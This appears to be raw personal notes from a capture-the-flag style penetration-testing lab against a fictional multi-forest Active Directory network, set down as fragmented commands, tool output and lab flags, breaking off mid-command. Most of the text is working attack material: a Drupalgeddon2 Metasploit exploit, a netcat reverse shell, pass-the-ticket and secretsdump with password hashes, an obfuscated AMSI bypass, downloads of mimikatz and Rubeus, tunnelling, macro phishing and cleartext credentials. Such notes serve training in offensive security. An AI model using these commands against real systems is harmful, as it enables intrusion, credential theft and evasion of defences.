BndkpYnhRSkhgoe4OWYzzP6B+0OYeIEhlMc+f0GZNx8I9ra1JxjOXnIfs02pHUw2lIhruoTnLA4lasi++141dl+TJC6sWCiybOkXPQs6Gy8yumCPgUvKlPdn7sH7dtcghpocJ1wNMfs5hZok39Ktz4OOEE6+HpUoJGFtALYyDPSEEhxlwTE5/u4ggrUMw5vs2EWOmzzQZ11+CN3k2vp9DFGsHPrrHmxP4BxZ0nSH+oVZRG6yz/7DDvSLwgn+Kt+vSum6ZD8SE+1t5K07PoP3Eic8dmsgcFKpbwYQUXExBWTRjTg+x19CQd7zOg9VS7LeLYqiDriejt3+yMBzwgUKhRmj7bt+9rO2eJue5kvsQqaI8E919ERvDsFErebOP7+3wVSSEptVOgSupBPKxSL2Un66oeQnDhjfY3aUqdFigVOSmQS/SqbqnWBDrDZlenCqFTSegLrtNUSbtisyy8o9fSmYBx5RwOn5Zo0rpnNrMzX7kNbKcpYC6+Ym65qPfR1U5CWcuXqn7PwouI/yezH+sdoEHAjAPcGZbdlCHcDtuSSvGQCwRJ4yw15kYMbJZcFdu9NcUQisME2++ax5ekFgblBUyn1/Ra37wxUtb9b4KJLe9cIvqWjlsDCVbKVyKyh2OSQ4uwTcHmby0svuNzMiFEr+GTh9GG7HRhO3g/fIVex+tBYnOom5A9GtcKa2FktADfxQ21e1Ztb1dEV7UL4GsQOqYPKOB3zCB3KADAgEAooHUBIHRfYHOMIHLoIHIMIHFMIHCoCswKaADAgESoSIEID0mxV0lNfaV+dZOa9THlC4Rxhp2Aaw//I6v2vsZzwx7oQsbCU0zQy5MT0NBTKIXMBWgAwIBAaEOMAwbCnN2Y19hcGFjaGWjBwMFAGChAAClERgPMjAyMzEyMDkxOTA1MTBaphEYDzIwMjMxMjEwMDQwMDE4WqcRGA8yMDIzMTIxNjE4MDAxOFqoCxsJTTNDLkxPQ0FMqR4wHKADAgECoRUwExsGa3JidGd0GwlNM0MuTE9DQUw= /ptt
dir \\m3dc.m3c.local
Cyb3rN3t1C5{C0n$tr@!n3d!}
secretsdump.py -hashes 5a0618a9e03bd9fa9efbe142468afed5:5a0618a9e03bd9fa9efbe142468afed5 m3c.local/Administrator@10.9.20.10
┌──(jay㉿localhost)-[~/prolabs/cybernatics]
└─$ cat m3dc_loot.txt| cut -d ":" -f1 > m3dc.users
┌──(jay㉿localhost)-[~/prolabs/cybernatics]
└─$ cat m3dc_loot.txt| cut -d ":" -f4 > m3dc.password
New Domain from m3dc.m3c.local
sudo ip route add 10.9.15.0/24 dev ligolo
Use Method 1 from above to login
To Everyone:
In an effort to increase our security posture, we have moved forward with user certificate authentication. If you haven't had the opportunity to come into the office or are using your own devices, you can request a certificate via the certenroll API (see below). For more information on this process check out https://blogs.technet.microsoft.com/askds/2010/05/25/enabling-cep-and-ces-for-enrolling-non-domain-joined-computers-for-certificates/. If you're still having issues email Ilene_Rasch@cyber.local over at Help Desk.
Furthermore, we have started to roll out our network segmentation plan to only allow business related traffic. We also deployed Zabbix with an API to increase our systems/network visibility. The process is simple, the zabapi user logs in, collects information and sends it back to the console.
Requesting a user certificate can only be done from a windows machine
1. Request a certificate from https://certenroll.cyber.local/ADPolicyProvider_CEP_UsernamePassword/service.svc/CEP (Public IP: 10.10.110.11. Requires RootCA from the parent SYSVOL directory)
2. Once you have a certificate you can authenticate to Email and Jenkins
User Email: https://mail.cyber.local/owa (Public IP: 10.10.110.12)
Jenkins: https://jenkins.cyber.local (Public IP: 10.10.110.12. Only DevOPS can authenticate to this portal)
Have a wonderful day!
10.9.15.11 COREWEBDL
sudo msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOSTS 10.9.15.11; set LHOST tun0; set LPORT 80; exploit"
shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.207 8080 >/tmp/f
www-data@corewebdl:/var/www/html$ cat flag.txt
cat flag.txt
Cyb3rN3t1C5{W3lC0m3_2_Cyb3rn3t!cs}
Linuenum
/etc/krb5.conf
[-] Location and Permissions (if accessible) of .bak file(s):
-rw-r--r-- 1 www-data root 0 Feb 20 2018 /var/www/html/drupal/core/modules/system/tests/fixtures/HtaccessTest/access_test.php.bak
-rw-r--r-- 1 www-data root 0 Feb 20 2018 /var/www/html/drupal/core/modules/system/tests/fixtures/HtaccessTest/access_test.module.bak
Linpeas
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
2 COREWEBDL$@CORE.CYBER.LOCAL
2 COREWEBDL$@CORE.CYBER.LOCAL
2 COREWEBDL$@CORE.CYBER.LOCAL
2 COREWEBDL$@CORE.CYBER.LOCAL
2 COREWEBDL$@CORE.CYBER.LOCAL
2 host/COREWEBDL@CORE.CYBER.LOCAL
2 host/COREWEBDL@CORE.CYBER.LOCAL
2 host/COREWEBDL@CORE.CYBER.LOCAL
2 host/COREWEBDL@CORE.CYBER.LOCAL
2 host/COREWEBDL@CORE.CYBER.LOCAL
2 host/corewebdl@CORE.CYBER.LOCAL
2 host/corewebdl@CORE.CYBER.LOCAL
2 host/corewebdl@CORE.CYBER.LOCAL
2 host/corewebdl@CORE.CYBER.LOCAL
2 host/corewebdl@CORE.CYBER.LOCAL
2 host/COREWEBDL.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL
2 host/COREWEBDL.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL
2 host/COREWEBDL.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL
2 host/COREWEBDL.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL
2 host/COREWEBDL.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL
2 host/corewebdl.core.cyber.local@CORE.CYBER.LOCAL
2 host/corewebdl.core.cyber.local@CORE.CYBER.LOCAL
2 host/corewebdl.core.cyber.local@CORE.CYBER.LOCAL
2 host/corewebdl.core.cyber.local@CORE.CYBER.LOCAL
2 host/corewebdl.core.cyber.local@CORE.CYBER.LOCAL
2 host/COREWEBDL.core.cyber.local@CORE.CYBER.LOCAL
2 host/COREWEBDL.core.cyber.local@CORE.CYBER.LOCAL
2 host/COREWEBDL.core.cyber.local@CORE.CYBER.LOCAL
2 host/COREWEBDL.core.cyber.local@CORE.CYBER.LOCAL
2 host/COREWEBDL.core.cyber.local@CORE.CYBER.LOCAL
2 host/corewebdl.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL
2 host/corewebdl.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL
2 host/corewebdl.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL
2 host/corewebdl.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL
2 host/corewebdl.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "COREWEBDL$@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "COREWEBDL$@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "COREWEBDL$@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "COREWEBDL$@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "COREWEBDL$@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl.core.cyber.local@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl.core.cyber.local@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl.core.cyber.local@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl.core.cyber.local@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl.core.cyber.local@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL.core.cyber.local@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL.core.cyber.local@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL.core.cyber.local@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL.core.cyber.local@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/COREWEBDL.core.cyber.local@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL"
--- Impersonation command: kadmin -k -t /etc/krb5.keytab -p "host/corewebdl.CORE.CYBER.LOCAL@CORE.CYBER.LOCAL"
tickets kerberos Not Found
cat /etc/krb5.conf
Using pbis tools
www-data@corewebdl:/opt/pbis/bin$ ./get-status
./get-status
LSA Server Status:
Compiled daemon version: 8.8.0.506
Packaged product version: 8.8.506.0
Uptime: 0 days 4 hours 56 minutes 27 seconds
[Authentication provider: lsa-activedirectory-provider]
Status: Online
Mode: Un-provisioned
Domain: CORE.CYBER.LOCAL
Domain SID: S-1-5-21-1559563558-3652093953-1250159885
Forest: cyber.local
Site: core
Online check interval: 300 seconds
[Trusted Domains: 5]
[Domain: core]
DNS Domain: core.cyber.local
Netbios name: core
Forest name: cyber.local
Trustee DNS name:
Client site name: core
Domain SID: S-1-5-21-1559563558-3652093953-1250159885
Domain GUID: 00000000-0000-0000-0000-000000000000
Trust Flags: [0x0019]
[0x0001 - In forest]
[0x0008 - Primary]
[0x0010 - Native]
Trust type: Up Level
Trust Attributes: [0x0000]
Trust Direction: Primary Domain
Trust Mode: In my forest Trust (MFT)
Domain flags: [0x0001]
[0x0001 - Primary]
[Domain Controller (DC) Information]
DC Name: coredc.core.cyber.local
DC Address: 10.9.15.10
DC Site: core
DC Flags: [0x0003f3fd]
DC Is PDC: yes
DC is time server: yes
DC has writeable DS: yes
DC is Global Catalog: yes
DC is running KDC: yes
[Global Catalog (GC) Information]
GC Name: coredc.core.cyber.local
GC Address: 10.9.15.10
GC Site: core
GC Flags: [0x0003f3fd]
GC Is PDC: yes
GC is time server: yes
GC has writeable DS: yes
GC is running KDC: yes
[Domain: CYBER]
DNS Domain: cyber.local
Netbios name: CYBER
Forest name: cyber.local
Trustee DNS name: CORE.CYBER.LOCAL
Client site name: Core
Domain SID: S-1-5-21-2011815209-557191040-1566801441
Domain GUID: 00000000-0000-0000-0000-000000000000
Trust Flags: [0x0027]
[0x0001 - In forest]
[0x0002 - Outbound]
[0x0004 - Tree root]
[0x0020 - Inbound]
Trust type: Up Level
Trust Attributes: [0x0020]
[0x0020 - Within forest]
Trust Direction: Twoway Trust
Trust Mode: In my forest Trust (MFT)
Domain flags: [0x0000]
[Domain Controller (DC) Information]
DC Name: cydc.cyber.local
DC Address: 10.9.10.10
DC Site: Root
DC Flags: [0x0003f37d]
DC Is PDC: yes
DC is time server: yes
DC has writeable DS: yes
DC is Global Catalog: yes
DC is running KDC: yes
[Global Catalog (GC) Information]
GC Name: coredc.core.cyber.local
GC Address: 10.9.15.10
GC Site: core
GC Flags: [0x0003f3fd]
GC Is PDC: yes
GC is time server: yes
GC has writeable DS: yes
GC is running KDC: yes
[Domain: D3V]
DNS Domain: d3v.local
Netbios name: D3V
Forest name: d3v.local
Trustee DNS name: cyber.local
Client site name: Default-First-Site-Name
Domain SID: S-1-5-21-1741135793-2392241712-4132009386
Domain GUID: 00000000-0000-0000-0000-000000000000
Trust Flags: [0x0022]
[0x0002 - Outbound]
[0x0020 - Inbound]
Trust type: Up Level
Trust Attributes: [0x0008]
[0x0008 - Forest transitive]
Trust Direction: Twoway Trust
Trust Mode: In other forest Trust (OFT)
Domain flags: [0x0000]
[Domain Controller (DC) Information]
DC Name: d3dc.d3v.local
DC Address: 10.9.30.10
DC Site: Default-First-Site-Name
DC Flags: [0x0003f3fd]
DC Is PDC: yes
DC is time server: yes
DC has writeable DS: yes
DC is Global Catalog: yes
DC is running KDC: yes
[Domain: M3C]
DNS Domain: m3c.local
Netbios name: M3C
Forest name: m3c.local
Trustee DNS name: cyber.local
Client site name: Default-First-Site-Name
Domain SID: S-1-5-21-340507432-2615605230-720798708
Domain GUID: 00000000-0000-0000-0000-000000000000
Trust Flags: [0x0020]
[0x0020 - Inbound]
Trust type: Up Level
Trust Attributes: [0x0008]
[0x0008 - Forest transitive]
Trust Direction: Zeroway Trust
Trust Mode: In other forest Trust (OFT)
Domain flags: [0x0000]
[Domain Controller (DC) Information]
DC Name: m3dc.m3c.local
DC Address: 10.9.20.10
DC Site: Default-First-Site-Name
DC Flags: [0x0001f3fd]
DC Is PDC: yes
DC is time server: yes
DC has writeable DS: yes
DC is Global Catalog: yes
DC is running KDC: yes
[Domain: inception]
DNS Domain: inception.local
Netbios name: inception
Forest name: inception.local
Trustee DNS name: cyber.local
Client site name: Default-First-Site-Name
Domain SID: S-1-5-21-3923830851-530095044-3265323199
Domain GUID: 00000000-0000-0000-0000-000000000000
Trust Flags: [0x0022]
[0x0002 - Outbound]
[0x0020 - Inbound]
Trust type: Up Level
Trust Attributes: [0x0008]
[0x0008 - Forest transitive]
Trust Direction: Twoway Trust
Trust Mode: In other forest Trust (OFT)
Domain flags: [0x0000]
[Domain Controller (DC) Information]
DC Name: indc.inception.local
DC Address: 10.9.40.5
DC Site: Default-First-Site-Name
DC Flags: [0x0003f3fd]
DC Is PDC: yes
DC is time server: yes
DC has writeable DS: yes
DC is Global Catalog: yes
DC is running KDC: yes
Summary of Forests and Domains:
-
CORE.CYBER.LOCAL (Primary Domain and Forest)
- Forest Name:
cyber.local - DC Name:
coredc.core.cyber.local - DC Address:
10.9.15.10 - Trustee DNS name: None (Primary Domain)
- Forest Name:
-
CYBER (Domain within the CORE Forest)
- Forest Name:
cyber.local - DC Name:
cydc.cyber.local - DC Address:
10.9.10.10 - Trustee DNS name:
CORE.CYBER.LOCAL - Trust Direction: Twoway Trust with CORE
- Forest Name:
-
D3V (Separate Forest with Trust Relationship)
- Forest Name:
d3v.local - DC Name:
d3dc.d3v.local - DC Address:
10.9.30.10 - Trustee DNS name:
cyber.local - Trust Direction: Twoway Trust with CYBER
- Forest Name:
-
M3C (Separate Forest with Trust Relationship)
- Forest Name:
m3c.local - DC Name:
m3dc.m3c.local - DC Address:
10.9.20.10 - Trustee DNS name:
cyber.local - Trust Direction: Zeroway Trust with CYBER
- Forest Name:
-
Inception (Separate Forest with Trust Relationship)
- Forest Name:
inception.local - DC Name:
indc.inception.local - DC Address:
10.9.40.5 - Trustee DNS name:
cyber.local - Trust Direction: Twoway Trust with CYBER
- Forest Name:
./adtool --keytab=/etc/krb5.keytab --logon-as=COREWEBDL$ -a search-ou --name= "core.cyber.local" -t | ./adtool --keytab=/etc/krb5.keytab --logon-as=COREWEBDL$ -a lookup-object --dn=- --attr=description
└─/ NTLM HASH : 4182816cd42bdb6d20f7fb89703f5c48 AES-256 HASH : e55623691c0e6b9aa833de108c382262f6af90cd77ecee5ff7f863d5e6405078 AES-128 HASH : 520f11715eeb76fd9cbc8b0e08e387e1
/opt/pbis/bin/adtool --keytab=/etc/krb5.keytab --logon-as=COREWEBDL$ -a lookup-object --attr=description --dn 'OU=Users,OU=core,DC=core,DC=cyber,DC=local'
/opt/pbis/bin/adtool --keytab=/etc/krb5.keytab --logon-as=COREWEBDL$ -a search-object --filter '(&(objectClass=user)(objectCategory=person))' -t | ./adtool --keytab=/etc/krb5.keytab --logon-as=COREWEBDL$ -a lookup-object --dn=- --attr=description
adtool -a lookup-object --dn=- --attr=description
kinit 'COREWEBDL$@CORE.CYBER.LOCAL' -k -t /etc/krb5.keytab
https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n "COREWEBDL$" | grep "CN" | while read line; do echo "$line" && ./adtool --keytab=/etc/krb5.keytab -n 'COREWEBDL$@CORE.CYBER.LOCAL' -a lookup-object --dn="$line" --attr "description" && echo "======================"; done
CN=Timothy Jorgenson,OU=Accounting,OU=Users,OU=core,DC=core,DC=cyber,DC=local
======================
CN=George Wirth,OU=Interns,OU=Users,OU=core,DC=core,DC=cyber,DC=local
v765#QLm^8 #Cyb3rN3t1C5{Cr3d$_!n_De$cr!pti0ns}
./agent_linux -connect 10.10.15.207:9001 --ignore-cert
Certenroll prep and Phising for 10.9.15.200
Followed the steps to add the certificate using the root ca obatined like this
smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.10.10'
/usr/local/bin/smbclient.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.12.0.dev1+20230921.20754.9c8f344b', 'smbclient.py')
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
Type help for list of commands
# use SYSVOL
# ls
drw-rw-rw- 0 Tue Dec 31 07:17:36 2019 .
drw-rw-rw- 0 Tue Dec 31 07:17:36 2019 ..
drw-rw-rw- 0 Tue Dec 31 07:17:36 2019 cyber.local
# cd cyber.local
# ls
drw-rw-rw- 0 Tue Dec 31 07:23:38 2019 .
drw-rw-rw- 0 Tue Dec 31 07:23:38 2019 ..
drw-rw-rw- 0 Thu Dec 14 04:16:17 2023 DfsrPrivate
drw-rw-rw- 0 Wed Jun 17 22:34:20 2020 Policies
drw-rw-rw- 0 Sun Jan 12 15:26:20 2020 scripts
# cd scripts
# ls
drw-rw-rw- 0 Sun Jan 12 15:26:20 2020 .
drw-rw-rw- 0 Sun Jan 12 15:26:20 2020 ..
-rw-rw-rw- 1472 Fri Jan 15 17:10:22 2021 ADFS-Token.cer
-rw-rw-rw- 468 Fri Jan 10 01:58:27 2020 cydc.cyber.local_Cyber-CA.crt
-rw-rw-rw- 200 Fri Jan 10 02:19:51 2020 Disable-NetBIOS.ps1
-rw-rw-rw- 1019904 Fri Jan 10 13:07:53 2020 LAPSx64.msi
-rw-rw-rw- 3723 Fri Jan 10 01:58:27 2020 WildCard.pfx
# mget *
[*] Downloading ADFS-Token.cer
[*] Downloading cydc.cyber.local_Cyber-CA.crt
[*] Downloading Disable-NetBIOS.ps1
[*] Downloading LAPSx64.msi
[*] Downloading WildCard.pfx
# exit
-
Logon as a local computer administrator account.
-
You can add the Root CA certificate to the computers Trusted Root Certification Authorities store via the MMC:
- Open the Run command and type MMC.
- Select File then Add/Remove Snap-in…
- Select Certificates, and click the Add > button.
- Select Computer Account, and click the Next button.
- Click the Finish button.
- Click OK
- Expand Certificates (Local Computer).
- Expand Trusted Root Certification Authorities.
- Right click on Certificates, and select All Tasks, and then select Import…
- Certificate Import Wizard comes up.
- Click the Next button.
- Click the Browse… button and navigate to the CER file.
- Click the Next button.
- Leave the defaults, and click the Next button.
- Click the Finish button.
- Open the Run command and type MMC.
Office macro microsoft word mail phising
https://github.com/christophetd/spoofing-office-macro
Baby-Try2.docm
IT should be in the projects
10.9.15.200 COREWKT001
$Reply.Body = "Cyb3rN3t1C5{Y0u_C@nt_Ph!`$h_M3}"
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:8080/HANDICAPPED_LEADERSHIP.exe', 'C:\Users\Ilene.Rasch\Desktop\HANDICAPPED_LEADERSHIP.exe')"Didn”t work because of the group policy
Next try was to check what right the user ilene.rasch have in the bloodhound.
The following results were found.
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:8080/powerview.ps1', 'C:\Users\Ilene.Rasch\Desktop\powerview.ps1')"powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:8080/powermad.ps1', 'C:\Users\Ilene.Rasch\Desktop\powermad.ps1')"bloodhound-python -u 'george.wirth' -p 'v765#QLm^8' -d 'core.cyber.local' -c all -ns 10.9.10.10
bloodhound-python -u 'george.wirth' -p 'v765#QLm^8' -d 'core.cyber.local' -c all -ns 10.9.20.10
I know that i need to go get devops user so trying other domain as well what george.wirth can access
cme smb 10.9.10.10-20 -u 'george.wirth' -p 'v765#QLm^8' -d core.cyber.local --shares
SMB 10.9.10.10 445 CYDC [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.18 445 CYAPP [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.13 445 CYMX [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.18 445 CYAPP [*] Enumerated shares
SMB 10.9.10.18 445 CYAPP Share Permissions Remark
SMB 10.9.10.18 445 CYAPP ----- ----------- ------
SMB 10.9.10.18 445 CYAPP ADMIN$ Remote Admin
SMB 10.9.10.18 445 CYAPP C$ Default share
SMB 10.9.10.18 445 CYAPP IPC$ READ Remote IPC
SMB 10.9.10.10 445 CYDC [*] Enumerated shares
SMB 10.9.10.10 445 CYDC Share Permissions Remark
SMB 10.9.10.10 445 CYDC ----- ----------- ------
SMB 10.9.10.10 445 CYDC ADMIN$ Remote Admin
SMB 10.9.10.10 445 CYDC C$ Default share
SMB 10.9.10.10 445 CYDC IPC$ READ Remote IPC
SMB 10.9.10.10 445 CYDC NETLOGON READ Logon server share
SMB 10.9.10.10 445 CYDC SYSVOL READ Logon server share
SMB 10.9.10.12 445 CYWAP [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.13 445 CYMX [*] Enumerated shares
SMB 10.9.10.13 445 CYMX Share Permissions Remark
SMB 10.9.10.13 445 CYMX ----- ----------- ------
SMB 10.9.10.13 445 CYMX address READ
SMB 10.9.10.13 445 CYMX ADMIN$ Remote Admin
SMB 10.9.10.13 445 CYMX C$ Default share
SMB 10.9.10.13 445 CYMX IPC$ READ Remote IPC
SMB 10.9.10.11 445 CYADFS [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.12 445 CYWAP [*] Enumerated shares
SMB 10.9.10.12 445 CYWAP Share Permissions Remark
SMB 10.9.10.12 445 CYWAP ----- ----------- ------
SMB 10.9.10.12 445 CYWAP ADMIN$ Remote Admin
SMB 10.9.10.12 445 CYWAP C$ Default share
SMB 10.9.10.12 445 CYWAP IPC$ READ Remote IPC
SMB 10.9.10.14 445 CYFS [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.11 445 CYADFS [*] Enumerated shares
SMB 10.9.10.11 445 CYADFS Share Permissions Remark
SMB 10.9.10.11 445 CYADFS ----- ----------- ------
SMB 10.9.10.11 445 CYADFS ADMIN$ Remote Admin
SMB 10.9.10.11 445 CYADFS C$ Default share
SMB 10.9.10.11 445 CYADFS IPC$ READ Remote IPC
SMB 10.9.10.11 445 CYADFS print$ READ Printer Drivers
SMB 10.9.10.17 445 CYGW [+] core.cyber.local\george.wirth:v765#QLm^8
SMB 10.9.10.17 445 CYGW [*] Enumerated shares
SMB 10.9.10.17 445 CYGW Share Permissions Remark
SMB 10.9.10.17 445 CYGW ----- ----------- ------
SMB 10.9.10.17 445 CYGW ADMIN$ Remote Admin
SMB 10.9.10.17 445 CYGW C$ Default share
SMB 10.9.10.17 445 CYGW IPC$ READ Remote IPC
SMB 10.9.10.14 445 CYFS [*] Enumerated shares
SMB 10.9.10.14 445 CYFS Share Permissions Remark
SMB 10.9.10.14 445 CYFS ----- ----------- ------
SMB 10.9.10.14 445 CYFS Accounting
SMB 10.9.10.14 445 CYFS ADMIN$ Remote Admin
SMB 10.9.10.14 445 CYFS Audit
SMB 10.9.10.14 445 CYFS Business Development
SMB 10.9.10.14 445 CYFS C$ Default share
SMB 10.9.10.14 445 CYFS Customer Service
SMB 10.9.10.14 445 CYFS DevOps
SMB 10.9.10.14 445 CYFS Directors
SMB 10.9.10.14 445 CYFS Engineering
SMB 10.9.10.14 445 CYFS GroupShare READ,WRITE
SMB 10.9.10.14 445 CYFS Help Desk
SMB 10.9.10.14 445 CYFS Human Resources
SMB 10.9.10.14 445 CYFS Interns
SMB 10.9.10.14 445 CYFS IPC$ READ Remote IPC
SMB 10.9.10.14 445 CYFS IT Admins
SMB 10.9.10.14 445 CYFS Linux Admins
SMB 10.9.10.14 445 CYFS Management
SMB 10.9.10.14 445 CYFS Marketing
SMB 10.9.10.14 445 CYFS Operations
SMB 10.9.10.14 445 CYFS Purchasing
SMB 10.9.10.14 445 CYFS Quality Assurance
SMB 10.9.10.14 445 CYFS RDS-Users READ,WRITE
SMB 10.9.10.14 445 CYFS Sales
SMB 10.9.10.14 445 CYFS Server Admins powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:80/Rubeus.exe', 'C:\Users\Ilene.Rasch\Desktop\Rubeus.exe')"
$psh = [PowerShell]::Create().AddCommand("powershell").AddParameter("ExecutionPolicy","Bypass").Invoke()
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:80/PowerUp.ps1', 'C:\Users\Ilene.Rasch\Desktop\PowerUp.ps1')"
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.15.57:80/mimikatz.exe', 'C:\Users\Ilene.Rasch\Desktop\mimikatz.exe')"
smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.20.14'
# use GroupShare
# ls
drw-rw-rw- 0 Sat Dec 16 15:54:39 2023 .
drw-rw-rw- 0 Sat Dec 16 15:54:39 2023 ..
-rw-rw-rw- 298 Sun Jan 12 01:30:42 2020 aes.key
-rw-rw-rw- 278 Sun Jan 12 01:30:42 2020 passwd.txt
-rw-rw-rw- 95 Sun Jan 12 01:30:42 2020 ReadMe.txt
smbclient.py 'core.cyber.local/george.wirth:v765#QLm^8@10.9.10.13'
Nothing on the above machine,
cme smb 10.9.10.10 -u 'george.wirth' -p 'v765#QLm^8' -d core.cyber.local --users
Decrypting Credentials from an SMB Share
While exploring an SMB share, I stumbled upon two intriguing files: aes.key and passwd.txt. Intrigued by their names and potential contents, I decided to investigate further. My first thought was that aes.key could be an encryption key, and passwd.txt likely contained encrypted data, possibly a password. To explore this hypothesis, I used a PowerShell environment on my Commando VM.
I started by loading the content of aes.key into a variable using the command:
$Key = Get-Content -Path C:\Users\jay\Desktop\aes.keyThis command read the contents of the aes.key file and stored it in the $Key variable. Next, I needed to load the encrypted message from the passwd.txt file. I achieved this with the following command:
$EncryptedMessage = Get-Content -Path "C:\Users\jay\Desktop\passwd.txt"With both the key and the encrypted message in hand, I was ready to attempt decryption. PowerShell offers a convenient way to handle encrypted strings through its SecureString object. I used the ConvertTo-SecureString cmdlet, which is designed to convert encrypted data into a SecureString object, using the key I had just loaded. The command was as follows:
$SecureStringPassword = $EncryptedMessage | ConvertTo-SecureString -Key $KeyUpon executing this command, the encrypted message was converted into a SecureString, a special kind of string in PowerShell that is used for handling sensitive information securely.
However, SecureString objects are not immediately readable. To view the decrypted password, I had to convert it back to a plain text string. This is a sensitive operation since it involves handling a password in an unencrypted form. To do this, I used the .NET class System.Runtime.InteropServices.Marshal which provides methods for dealing with unmanaged code. The commands were:
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($SecureStringPassword)
